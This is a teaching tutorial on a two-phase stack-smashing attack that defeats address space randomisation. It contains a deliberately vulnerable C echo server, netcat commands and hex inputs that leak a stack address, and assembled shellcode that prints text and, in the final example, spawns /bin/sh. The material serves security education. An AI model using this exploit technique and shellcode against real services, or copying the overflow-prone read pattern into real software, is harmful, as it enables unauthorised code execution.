Note: All files needed for this tutorial can be found here.
Tutorial: a trivial stack-based buffer overflow in two phases
By H. Bos
Updated: September 2007, June 2008.
----------------------------------------------------------------------
This tutorial shows a trivial case of a two-phase attack that works on
systems with address space randomisation (ASR). The attack is a simple
network-based stack smashing exploit. The reason for writing this
tutorial is that students sometimes ask the following questions when
we are discussing the basics of buffer overflows:
"Surely, address space randomisation makes stack overflows
impossible?"
"How do you know the address of the buffer containing your
shellcode? After all, you need this address a priori. Otherwise,
where will you make the program jump?"
I stress that the example below is just one of many possibities and
perhaps (hopefully) the easiest one to understand. It only serves to
demonstrate how you could make a simple stack smashing attack work on
a modern Linux distribution. Note however, that it assumes that stack
smashing itself is not prevented. For instance, it will not work if
canary values are used to protect the stack. You may want to compile
with -fno-stack-protector to be sure.
Before you start, make sure to have installed the following tools (or
their equivalents): hexedit, hexdump, netcat, and nasm.
----------------------------------------------------------------------
Introduction
------------
In a 2-phase attack, a first connection is used to obtain the address
of a known value (in this case on the stack). This address is used to
calculate the appropriate address to place in the return address.
The vulnerable server is shown in vulnerable.c. It is a quick and
dirty implementation, with a bunch of debug messages you may
ignore. But it works and it is, in principle, a real network
server. You can make the server by typing:
make
It should create an executable 'badbuf' that can be started with:
badbuf <port>
For instance, start the server so as to make it listen on port 54321:
debris: ../bufferoverflow>badbuf 54321
The vulnerable function is called oops(). It looks like this:
int oops (int newsockfd)
{
int len;
char buf [56];
int i,n;
len = 56;
bzero(buf,len);
n = read (newsockfd, buf, 255); // overflow possible
if (n < 0) error("ERROR reading from socket");
// 'echo' the message
if (len>255) len = 255;
printf ("Echoing %d characters\n", len);
for (i=0; i<len; i++) {
// pretty dumb svr: echos characters 1 at a time
write(newsockfd, buf+i,1);
if (n < 0) error("ERROR writing to socket");
}
return 0;
}
A. The main idea
----------------------------------------------------------------------
Stack smashing is not complicated at all. It does require some
knowledge about how a stack frame is organised in our x86 based
machines:
- The stack grows from top (high addresses) to bottom (low-addresses).
- When a function is called the following info is found on the stack
* first, the parameters are pushed on the stack
[Actually, a small no. of parameters can be passed via registers,
but let us ignore that for now, as it is not very important for
this tutorial.]
* Second, the return address is pushed.
This is the address that the CPU will jump to when the function
returns.
* Next, we find the saved frame pointer (or EBP, as Intel refers to
it as 'extended base pointer').
EBP points to the previous stack frame. More precisely, it points
to the place in the previous stack frame, where *it* has saved the
saved the previous EBP).
* Finally, we find the space for local variables on the stack.
Whenever the function declares a local variable (such as 'len' in
the function 'oops()' above), the appropriate amount of memory is
reserved. In the case of 'len', this will be 4 bytes. In the case
of 'buf' 56 bytes, and so on.
Note that the size of buffer 'buf' in function oops is 56B. We want to
overflow it in such a way that we get to control the program. In other
words, we want to feed it a chunk of data that overflows the buffer
'buf' and puts a new address at the location that holds the return
address of the function. Then, when the function returns, it will
return to the address we provided, rather than the location from where
the function call was made. For simplicity, we will place our
'shellcode' in buf, so we want to overflow the return address with the
address of buf. So, when the function returns, the CPU will jump to
the beginning of 'buf' and start executing the instructions that it
finds there (i.e., *our* shellcode).
Unfortunately, modern OSs use ASR, so we do not know at which address
buf resides. So, we use two-phase attack. First, we overflow the
buffer to make the program send us a stack address (the saved EBP
value). We then use this address to calculate the location of buf.
B. Finding the address to put in the return address field on the stack
----------------------------------------------------------------------
To do this we overflow the buffer in such a way that a new value is
placed in the variable 'len' (which happens to sit just above 'buf'),
which causes the program to output more data than it intended. For
instance, we send the following data to the svr (assume that we have
saved the data in the file getaddress.inp):
debris: ../bufferoverflow>hexdump -C getaddress.inp
00000000 30 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 |0123456789012345|
00000010 36 37 38 39 30 31 32 33 34 35 36 37 38 39 30 31 |6789012345678901|
00000020 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 |2345678901234567|
00000030 38 39 30 31 32 33 34 35 58 00 00 00 |89012345X...|
The input contains 56 ascii characters (the numbers 0-9), followed by
0x00000058 (in little endian). Because 'len' sits just above 'buf',
this input will overwrite 'len' with 0x58 and cause the program to
'echo' 0x58 = 88 characters, i.e., the buffer *plus* a fair share of
the stack above it. Hopefully, this yields something useful.
We send the above input using the program netcat ('nc') as follows
(client and server are both running on the same host):
debris: ../bufferoverflow>cat getaddress.inp | nc 127.0.0.1 54321 | hexdump -C
00000000 30 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 |0123456789012345|
00000010 36 37 38 39 30 31 32 33 34 35 36 37 38 39 30 31 |6789012345678901|
00000020 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 |2345678901234567|
00000030 38 39 30 31 32 33 34 35 58 00 00 00 3c 00 00 00 |89012345X...<...|
00000040 3c 00 00 00 d8 f5 ff bf 7a 89 04 08 04 00 00 00 |<.......z.......|
00000050 a8 f5 ff bf c8 f5 ff bf |........|
00000058
Yes, we found something useful: the saved EBP. It is the address 'd8
f5 ff bf' in line 00000040. How do I know this is the appropriate
address? Well, it is the first 4 byte number that *looks* like a stack
address above the 'buf' and 'len' variables. It is followed by a 4
bytes number that looks like an instruction address, so we are
probably on the right track. You may wonder about the two 4B values
between 'len' and 'saved EBP'. Apparently, the compiler reserved this
space here for other variables. (It is not very important, but you may
suspect that it corresponds to the amount of data that was read, as
the value is 0x3C = 60 bytes, which is exactly the amount of data in
getaddress.inp.)
As mentioned earlier, the 'old EBP' value saved on the stack points to
a specific place in the previous stack frame. Let us see:
d8 f5 ff bf in little endian -> bffff5d8
We know the program, so we are able to find out the difference between
the previous EBP and the current location where EBP was stored. (If
you don't know this precisely, it is not so hard to find, either by
analysis, or by trial and error). In my case, this happens to be 0x50
= 80. Now, the difference with the start of buf can also be easily
calculated:
EBP was saved at 0xbffff5d8-0x50 = 0xbffff588. We know (and/or see
from our hexdump above) that the start of buffer is 68B below the
address at which EBP was stored, so we have to patch in the address:
0xbffff588 - 0x44 = 0xbffff544
I wrote a small shell script to calculate this. Simply copy in the
bytes as reported by the hexdump output above and the result (in the
most useful order will be printed):
debris: ../bufferoverflow>calcAddr.sh d8 f5 ff bf
44 F5 FF BF
debris: ../bufferoverflow>
These hex numbers will be used later on.
*** SHORTCUT: if you hate typing and want to be really efficient, you
can use the following (somewhat cryptic command):
./calcAddr.sh `cat getaddress.inp | nc 127.0.0.1 54321 | hexdump -C | grep -m 1 -o -G [0-9a-f][0-9a-f][[:space:]][0-9a-f][0-9a-f][[:space:]][0-9a-f][0-9a-f][[:space:]]bf
This invokes calcAddr.sh on the first occurrence of an
address like ?? ?? ?? bf in whatever we receive from the
server. Don't you just love Unix?
B. The shellcode
----------------------------------------------------------------------
Now we must provide a bit of 'shellcode' to be executed and patch in
the return addres that we just calculated at the appropriate place.
We will do this using hexedit. Again, we want to send the shellcode in
an input and with that same input overflow the return address to make
the CPU return to the start of 'buf' (which by then contains the
shellcode). So the malicious input we will generate looks like this:
|----------|
| 44F5FFBF |
|----------|
| |
| |
|shellcode |
| |
| |
|----------|
The shellcode.asm should be suitable for this vulnerability. It is
easily small enough to fit in the 56B buffer. It does not do much
(just prints 'hello world'), but that is not the point.
Writing good shellcode is an art, but a bit of knowledge of assembly
should go a long way. This is our program in assembly:
[SECTION .text]
global _start
_start:
jmp short stringaddress
mystart:
xor eax, eax ;clean up the registers
xor ebx, ebx
xor edx, edx
xor ecx, ecx
mov al, 4 ;syscall 4 means a write
mov bl, 1 ;stdout is 1
pop ecx ;get the address of the string from the stack
mov dl, 13 ;length of the string
int 0x80 ;do syscall
xor eax, eax
mov al, 1 ;syscall 1=exit (so we exit the shellcode)
xor ebx,ebx
int 0x80
stringaddress:
call mystart ;puts the address of the string on the stack :)
db "hello world!"
Now we want to get the machine code that corresponds to this code:
debris: ../bufferoverflow>nasm -felf shellcode.asm
debris: ../bufferoverflow>ld -s -o scode shellcode.o
debris: ../bufferoverflow>objdump -d scode
h: file format elf32-i386
Disassembly of section .text:
08048060 <.text>:
8048060: eb 19 jmp 0x804807b
8048062: 31 c0 xor %eax,%eax
8048064: 31 db xor %ebx,%ebx
8048066: 31 d2 xor %edx,%edx
8048068: 31 c9 xor %ecx,%ecx
804806a: b0 04 mov $0x4,%al
804806c: b3 01 mov $0x1,%bl
804806e: 59 pop %ecx
804806f: b2 0d mov $0xd,%dl
8048071: cd 80 int $0x80
8048073: 31 c0 xor %eax,%eax
8048075: b0 01 mov $0x1,%al
8048077: 31 db xor %ebx,%ebx
8048079: cd 80 int $0x80
804807b: e8 e2 ff ff ff call 0x8048062
8048080: 68 65 6c 6c 6f push $0x6f6c6c65
8048085: 20 77 6f and %dh,0x6f(%edi)
8048088: 72 6c jb 0x80480f6
804808a: 64 fs
804808b: 21 .byte 0x21
804808c: 5c pop %esp
804808d: 6e outsb %ds:(%esi),(%dx)
Ok, that is just what we need. Let us stick the numbers in the middle
column in a file and call it shellcode.inp:
debris: ../bufferoverflow>hexedit shellcode.inp
00000000 EB 19 31 C0 31 DB 31 D2 31 C9 B0 04 B3 01 59 B2 ..1.1.1.1.....Y.
00000010 0C CD 80 31 C0 B0 01 31 DB CD 80 E8 E2 FF FF FF ...1...1........
00000020 68 65 6C 6C 6F 20 77 6F 72 6C 64 20 0C
We still have to make sure to add the return address at the appropriate
offset. The return address was calculated under (B). We place at the
location that is just 4B up from where we found the save value of EBP
(i.e., at offset 0x48).
00000000 EB 19 31 C0 31 DB 31 D2 31 C9 B0 04 B3 01 59 B2 ..1.1.1.1.....Y.
00000010 0C CD 80 31 C0 B0 01 31 DB CD 80 E8 E2 FF FF FF ...1...1........
00000020 68 65 6C 6C 6F 20 77 6F 72 6C 64 20 0C 00 00 00 hello world ....
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040 00 00 00 00 00 00 00 00 44 F5 FF BF ........D...
Now our exploit is ready. Let us send it to the badbuf server that is
still running:
debris: ../bufferoverflow>cat shellcode.inp | nc 127.0.0.1 54321
At the server side, the result is that the server prints 'hello world'
and exits. The full run is shown below (it includes the output
generated on behalf of the first connection):
debris: ../bufferoverflow>badbuf 54321
Echoing 88 characters
returned
Echoing 0 characters
hello world debris: ../bufferoverflow>
The exploit worked! This is the end of the tutorial. We just have some
additional comments.
*** SHORTCUT NOTE: use the script './attack.sh <port>' if you want to
automate this entire procedure. The script will send
getaddress.inp, extract the address of EBP, calculate the address
of our buffer, patch in the address in shellcode.inp, and send it
to the server.
*** The hello world example shown above of course cannot be termed
'shellcode' as it does not give you a shell. The following
shellcode is more interesting. As I am switching from nasm to as,
i will give this example in gnu syntax:
.section .text
.global _start
_start:
/* we first jump to string address and then immediately return
via a call, so that when we arrive at mystart, the address of
the string will be on the stack. Clever. */
jmp string_addr
mystart:
pop %ebx /* get the string address */
xor %eax,%eax /* zero eax */
movb %al, 7(%ebx) /* move a NULL in 'N' position of the string */
movl %ebx, 8(%ebx) /* mov the address of the string in XXXX */
movl %eax, 12(%ebx) /* mov 0 (32b) in YYYY */
movb $11,%al /* syscall 11 = execve */
/* first argument (ebx) points to the file */
leal 8(%ebx), %ecx /* address of second argument in ecx*/
leal 12(%ebx), %edx /* address of third argument in ecx*/
int $0x80 /* do it */
string_addr:
call mystart
.asciz "/bin/shNXXXXYYYY"
If you use this instead of the helloworld example you will get
an actual shell on the server.
Have fun!
HJB